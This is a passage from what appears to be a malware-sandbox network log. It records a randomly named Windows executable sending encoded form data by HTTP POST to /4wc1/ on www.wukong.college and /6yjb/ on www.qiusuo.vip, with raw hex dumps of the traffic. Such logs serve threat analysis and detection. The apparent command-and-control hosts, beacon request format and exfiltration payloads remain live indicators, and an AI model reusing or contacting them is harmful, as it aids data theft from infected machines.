                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.11.204972047.52.221.8802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:30:06.171499014 CET753OUTPOST /4wc1/ HTTP/1.1
                                                                                                                            Host: www.wukong.college
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.wukong.college
                                                                                                                            Referer: http://www.wukong.college/4wc1/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 37 71 50 33 67 37 70 48 59 74 33 35 42 62 68 4e 4d 50 31 41 4a 70 38 37 4c 76 77 48 35 55 39 4c 36 38 62 41 75 79 47 62 6a 78 4f 4e 4b 70 55 6b 73 75 75 59 43 37 58 49 6c 55 4c 48 35 64 50 39 75 4f 69 4c 47 2f 77 61 63 78 71 66 6f 36 74 47 54 50 77 4a 58 6a 4b 74 39 4d 46 51 4e 47 39 41 57 47 79 62 69 42 5a 44 44 48 6d 51 62 70 52 63 70 73 49 69 30 52 7a 4e 37 6b 5a 72 59 59 49 6e 37 37 36 51 34 2b 36 6c 41 6d 6b 4d 38 4f 74 62 4a 42 51 52 36 68 54 37 55 6c 4d 50 38 68 4c 34 70 58 67 6b 6a 2b 7a 68 78 6d 77 72 38 70 45 73 61 47 73 2b 73 76 45 41 4f 43 36 69 77 74 79 44 4c 77 3d 3d
                                                                                                                            Data Ascii: mRu=7qP3g7pHYt35BbhNMP1AJp87LvwH5U9L68bAuyGbjxONKpUksuuYC7XIlULH5dP9uOiLG/wacxqfo6tGTPwJXjKt9MFQNG9AWGybiBZDDHmQbpRcpsIi0RzN7kZrYYIn776Q4+6lAmkM8OtbJBQR6hT7UlMP8hL4pXgkj+zhxmwr8pEsaGs+svEAOC6iwtyDLw==
                                                                                                                            Nov 12, 2024 15:30:06.488620996 CET389INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:30:06 GMT
                                                                                                                            Server: Apache
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Content-Length: 178
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00
                                                                                                                            Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+|OX)@OG>Wr~b


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.11.204972147.52.221.8802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:30:09.030860901 CET773OUTPOST /4wc1/ HTTP/1.1
                                                                                                                            Host: www.wukong.college
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.wukong.college
                                                                                                                            Referer: http://www.wukong.college/4wc1/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 37 71 50 33 67 37 70 48 59 74 33 35 41 37 52 4e 41 4e 64 41 63 5a 38 34 48 50 77 48 33 30 39 58 36 38 66 41 75 7a 44 63 6a 6a 71 4e 4b 4d 6f 6b 2b 38 4b 59 50 62 58 49 74 30 4b 44 6e 74 50 49 75 4f 75 35 47 2f 63 61 63 79 57 66 6f 2b 39 47 54 63 49 57 55 54 4b 76 6f 38 46 65 4a 47 39 41 57 47 79 62 69 42 63 6f 44 47 4f 51 62 5a 68 63 70 4e 49 68 33 52 7a 4f 2b 6b 5a 72 4a 6f 49 6a 37 37 37 44 34 38 4f 50 41 6c 51 4d 38 4c 52 62 4a 51 51 53 30 68 54 35 4a 31 4e 41 33 52 75 51 68 55 41 6d 71 4e 44 38 2b 30 55 77 77 66 4a 32 48 30 59 61 76 38 59 79 4b 79 44 4b 79 76 7a 59 57 35 4a 56 2f 6f 74 75 33 4d 39 6e 47 61 33 46 4e 54 35 72 56 4f 38 3d
                                                                                                                            Data Ascii: mRu=7qP3g7pHYt35A7RNANdAcZ84HPwH309X68fAuzDcjjqNKMok+8KYPbXIt0KDntPIuOu5G/cacyWfo+9GTcIWUTKvo8FeJG9AWGybiBcoDGOQbZhcpNIh3RzO+kZrJoIj777D48OPAlQM8LRbJQQS0hT5J1NA3RuQhUAmqND8+0UwwfJ2H0Yav8YyKyDKyvzYW5JV/otu3M9nGa3FNT5rVO8=
                                                                                                                            Nov 12, 2024 15:30:09.348335981 CET389INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:30:09 GMT
                                                                                                                            Server: Apache
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Content-Length: 178
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00
                                                                                                                            Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+|OX)@OG>Wr~b


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.11.204972247.52.221.8802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:30:11.890522957 CET2578OUTPOST /4wc1/ HTTP/1.1
                                                                                                                            Host: www.wukong.college
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.wukong.college
                                                                                                                            Referer: http://www.wukong.college/4wc1/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 37 71 50 33 67 37 70 48 59 74 33 35 41 37 52 4e 41 4e 64 41 63 5a 38 34 48 50 77 48 33 30 39 58 36 38 66 41 75 7a 44 63 6a 6a 69 4e 4c 36 38 6b 73 4d 32 59 4f 62 58 49 6e 55 4b 41 6e 74 50 52 75 50 47 39 47 2f 68 6c 63 30 61 66 70 63 31 47 48 39 49 57 44 6a 4b 76 71 38 46 66 4e 47 39 56 57 47 69 66 69 42 4d 6f 44 47 4f 51 62 61 70 63 67 38 49 68 37 78 7a 4e 37 6b 5a 76 59 59 49 4c 37 37 69 32 34 38 61 31 48 57 49 4d 2f 72 68 62 45 43 49 53 34 68 54 2f 61 46 4d 66 33 52 53 50 68 55 64 58 71 4d 6e 61 2b 7a 49 77 36 65 30 68 55 48 77 43 78 50 38 45 47 42 72 67 35 50 54 50 65 37 52 76 76 34 68 61 77 4b 35 72 46 70 71 4e 57 44 52 49 4d 4c 35 6a 46 2f 35 67 74 43 54 36 7a 5a 34 36 62 54 48 53 4e 69 4c 32 6b 41 61 78 76 4f 68 42 37 63 57 2b 6f 4c 4e 58 2b 6b 6a 4a 30 78 42 42 70 67 36 6b 41 34 41 61 4a 7a 34 59 6e 32 46 39 36 2f 71 75 76 74 66 4d 63 6d 61 59 76 44 62 4a 61 4f 37 4b 6a 63 6a 2f 4f 30 72 2b 37 2f 75 36 43 5a 34 55 52 33 36 66 46 54 32 69 5a 41 31 76 32 43 4d 39 70 30 64 53 4d 6f [TRUNCATED]
                                                                                                                            Data Ascii: mRu=7qP3g7pHYt35A7RNANdAcZ84HPwH309X68fAuzDcjjiNL68ksM2YObXInUKAntPRuPG9G/hlc0afpc1GH9IWDjKvq8FfNG9VWGifiBMoDGOQbapcg8Ih7xzN7kZvYYIL77i248a1HWIM/rhbECIS4hT/aFMf3RSPhUdXqMna+zIw6e0hUHwCxP8EGBrg5PTPe7Rvv4hawK5rFpqNWDRIML5jF/5gtCT6zZ46bTHSNiL2kAaxvOhB7cW+oLNX+kjJ0xBBpg6kA4AaJz4Yn2F96/quvtfMcmaYvDbJaO7Kjcj/O0r+7/u6CZ4UR36fFT2iZA1v2CM9p0dSMo3Td2dRorgOsidURgvc3Qrhl7C0EYMJS5u1iAiwtsV4QbYcp2g+0g3fvSIBFWPkcGpuERIRUCT6+UhvctNHpCNUPTW4mDPAre+/aWP+BBTq2NcC2Ky4HW8XpGcZn8CPyZUL1deHk+wHsUtUGxVXEhQl4f7brxRP2l9OsGKQ1Foypm68boFymbuAXYRUbA/3vEdVKgulJCXCCV2fcunNNkKi12Amxgy1yc2ehLj22oIilpCStcJogY4HwMcQ2DQtNxpMlTOLfI+0q3ath1w+iRlEG2433/z+TVtqXL97uV0qUbnAOiIXSJBWhXdH3h1fHpQohXBMEivLa3erFbliubcu4m27B9YmW3xW1IuAAFDcc4DOBlAySU4uTXereOGGfCoPsXXhPwthl9rQHqwWQ2DnObW/8fURj7U/9ZBrRnwIkVnMPFTnqJswcreWnWltpLYX/6aUX7i/9LVU9Oe4Ph8vpzrEEICMUPjje0KYInHLGXGbKmdyFnqlk1qR5a0JzRTWO7zISkN5jf6r3Xa49aJgKntk3cag1Wt76cE/6XYtv7kxbrU7ihOHmNj+c92ll0Eqak2KZ8z+zOf0OjDipqxisB+80l91OoGsuqFKlSb7nfpCxyDceMVwffSTYEdEhsOcDurKfGXSvgj09wqFQAzAxIdJgDozL/t0 [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:30:11.890587091 CET5344OUTData Raw: 58 66 6b 53 69 34 56 54 57 6b 4d 53 6c 59 4b 66 4c 30 61 2f 6b 4c 72 62 58 30 78 43 4b 73 63 61 76 4a 2f 64 6a 39 51 6b 78 2b 52 6d 30 43 53 78 6a 35 4b 4f 51 58 71 44 59 47 71 41 2b 58 68 36 44 7a 67 4c 31 68 6c 45 31 67 72 4e 69 74 65 71 65 76
                                                                                                                            Data Ascii: XfkSi4VTWkMSlYKfL0a/kLrbX0xCKscavJ/dj9Qkx+Rm0CSxj5KOQXqDYGqA+Xh6DzgL1hlE1grNiteqevvcmmrLjrCwxTwTrK0aKHpWiCAwY0B9AfAlR5I2gZaOWR/Jib/AOdehgsncFhG3YzRcJpLFgF//VJTcFeSrrgd2pS9dXUxgO0uvJ4a+FTuY2JFIGY2zrEPpuO5lq9HlY5GlrUyrFVCbgA5jGilDWDXzfOcFoQlUCa+
                                                                                                                            Nov 12, 2024 15:30:12.210099936 CET389INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:30:12 GMT
                                                                                                                            Server: Apache
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Content-Length: 178
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00
                                                                                                                            Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+|OX)@OG>Wr~b


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.11.204972347.52.221.8802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:30:14.756283045 CET477OUTGET /4wc1/?mRu=2onXjOgtXs7bFrsmBuZreqMXUphshRxX5MKbqzS42irGFJYns6q4JN3vt1eB5PqznJS/LdYYFyeg3ON9AeFtKxD4o+R2FH9zSHG9zjVrST6RS49i0a4KyRw=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.wukong.college
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:30:15.088499069 CET390INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:30:14 GMT
                                                                                                                            Server: Apache
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Length: 203
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 34 77 63 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /4wc1/ was not found on this server.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.11.2049724154.38.64.6802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:30:21.153552055 CET741OUTPOST /6yjb/ HTTP/1.1
                                                                                                                            Host: www.qiusuo.vip
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.qiusuo.vip
                                                                                                                            Referer: http://www.qiusuo.vip/6yjb/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 59 61 6c 54 53 47 57 50 4f 35 39 7a 32 59 64 57 52 49 74 6a 69 38 78 78 31 6f 42 44 68 43 50 52 48 42 37 4c 47 49 34 65 6d 38 53 69 4a 4d 49 54 66 69 37 6a 55 33 42 5a 79 71 72 35 70 4c 77 33 52 64 58 41 70 6d 6e 30 32 4a 57 4e 34 65 4f 47 52 67 53 70 45 36 41 7a 79 31 62 4f 30 6a 54 4a 4a 57 73 49 45 72 35 78 73 6f 30 39 64 2f 30 61 51 54 73 69 4a 59 36 6c 5a 4d 6d 73 39 61 54 32 72 66 58 66 55 6b 53 78 46 4a 4c 4c 41 38 74 6c 63 2f 73 63 37 36 50 35 30 56 35 72 2b 73 32 46 64 4f 6d 67 78 64 71 6e 33 79 61 72 64 77 43 7a 34 55 57 68 39 78 78 36 53 42 61 6f 61 73 32 6f 44 67 3d 3d
                                                                                                                            Data Ascii: mRu=YalTSGWPO59z2YdWRItji8xx1oBDhCPRHB7LGI4em8SiJMITfi7jU3BZyqr5pLw3RdXApmn02JWN4eOGRgSpE6Azy1bO0jTJJWsIEr5xso09d/0aQTsiJY6lZMms9aT2rfXfUkSxFJLLA8tlc/sc76P50V5r+s2FdOmgxdqn3yardwCz4UWh9xx6SBaoas2oDg==
                                                                                                                            Nov 12, 2024 15:30:21.474091053 CET535INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Nov 2024 14:30:21 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Content-Length: 337
                                                                                                                            Connection: close
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00
                                                                                                                            Data Ascii: 1o0w~oKU!TQ:!*'UP@D2ll2'%*!$mj$+8e*^ *fm6Rvl)J@N_W%Jrx|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x|$


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.11.2049725154.38.64.6802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:30:24.009607077 CET761OUTPOST /6yjb/ HTTP/1.1
                                                                                                                            Host: www.qiusuo.vip
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.qiusuo.vip
                                                                                                                            Referer: http://www.qiusuo.vip/6yjb/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 59 61 6c 54 53 47 57 50 4f 35 39 7a 33 37 31 57 51 75 6c 6a 75 4d 78 79 70 34 42 44 33 79 50 4b 48 42 2f 4c 47 4e 64 54 6d 4b 69 69 4a 73 59 54 63 6a 37 6a 54 33 42 5a 35 4b 72 38 71 37 78 37 52 61 65 31 70 6e 62 30 32 49 79 4e 34 66 2b 47 52 58 4f 71 47 71 41 31 36 56 62 4d 33 54 54 4a 4a 57 73 49 45 72 73 73 73 73 51 39 64 4e 67 61 53 79 73 6a 58 49 36 6b 61 4d 6d 73 35 61 54 79 72 66 58 74 55 6c 4f 62 46 50 48 4c 41 39 64 6c 64 72 34 64 31 4b 50 37 36 31 34 75 79 4a 71 42 61 76 47 79 31 74 79 58 37 79 57 4e 56 47 50 70 6c 6d 69 46 2b 69 74 49 57 78 6a 41 59 75 33 7a 65 68 39 45 45 33 42 70 6f 36 48 75 63 6e 4b 76 39 38 38 50 68 73 4d 3d
                                                                                                                            Data Ascii: mRu=YalTSGWPO59z371WQuljuMxyp4BD3yPKHB/LGNdTmKiiJsYTcj7jT3BZ5Kr8q7x7Rae1pnb02IyN4f+GRXOqGqA16VbM3TTJJWsIErssssQ9dNgaSysjXI6kaMms5aTyrfXtUlObFPHLA9dldr4d1KP7614uyJqBavGy1tyX7yWNVGPplmiF+itIWxjAYu3zeh9EE3Bpo6HucnKv988PhsM=
                                                                                                                            Nov 12, 2024 15:30:24.331356049 CET535INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Nov 2024 14:30:24 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Content-Length: 337
                                                                                                                            Connection: close
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00
                                                                                                                            Data Ascii: 1o0w~oKU!TQ:!*'UP@D2ll2'%*!$mj$+8e*^ *fm6Rvl)J@N_W%Jrx|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x|$


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            7192.168.11.2049726154.38.64.6802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:30:26.861804962 CET7910OUTPOST /6yjb/ HTTP/1.1
                                                                                                                            Host: www.qiusuo.vip
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.qiusuo.vip
                                                                                                                            Referer: http://www.qiusuo.vip/6yjb/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
